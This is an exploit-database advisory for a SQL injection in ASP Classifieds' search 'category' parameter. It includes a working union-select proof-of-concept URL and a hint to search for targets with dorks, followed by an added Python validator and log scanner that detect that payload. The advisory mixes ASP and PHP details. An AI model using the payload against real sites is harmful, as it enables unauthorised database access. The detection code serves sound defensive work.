ASP Classifieds - SQL Injection

EDB-ID: 18613
Author: r45c4l
Type: webapps
Platform: PHP
Date: 2012-03-17

# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :

ASP Classifieds is one of the most customizable classified ad programs
that exist for ASP and Access. Unlimited images, unlimited categories
and much, much more make it perfect for those who want to set up a used
stamps classifieds to those wanting to show and sell real estate.


Product Cost : 58$



=======================Exploit====================================
                      ---ICW---

[ EXPL0!T ]

SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]

PoC - 

http://SERVER/classi/search.php?category=-1+union+all+select+version()--

[Note: Tested on demo website]

d0rk - use your brain ;)
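
A defensive check for the `category` parameter shown in the PoC above, added here as an example (not part of the original advisory or the product's code): it applies an integer allow-list to the value and scans web access logs for requests that fail it. The integer-only category format, the Common Log Format input and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate category ids are plain non-negative integers
# (the advisory does not document the parameter's expected format).
VALID_CATEGORY = re.compile(r"[0-9]{1,10}")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def category_is_valid(value):
    """Allow-list check to apply before the value reaches any SQL statement."""
    return VALID_CATEGORY.fullmatch(value) is not None

def suspicious_requests(log_lines, path_suffix="/search.php"):
    """Return (client, decoded category) for requests whose category fails the check."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(path_suffix):
            continue
        # parse_qs percent-decodes the value and turns '+' into a space,
        # so differently encoded variants are compared in one form.
        for value in parse_qs(url.query, keep_blank_values=True).get("category", []):
            if not category_is_valid(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (Common Log Format), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Mar/2012:10:00:01 +0000] "GET /classi/search.php?category=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [17/Mar/2012:10:00:07 +0000] "GET /classi/search.php?category=-1+union+all+select+version()-- HTTP/1.1" 200 812',
    '192.0.2.44 - - [17/Mar/2012:10:00:09 +0000] "GET /classi/search.php?category=%2D1%20UNION%20ALL%20SELECT%20version()-- HTTP/1.1" 200 812',
    '192.0.2.10 - - [17/Mar/2012:10:00:12 +0000] "GET /classi/index.php?category=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric category: {value!r}")
```

The same allow-list belongs in the application itself, alongside a parameterized query, so a rejected value never reaches the database.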

===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam

All members of ICW, AH and darkc0de, and all Indian Hackers



Special Greetz to : b4ltazar and s1nner_01


=== End () ====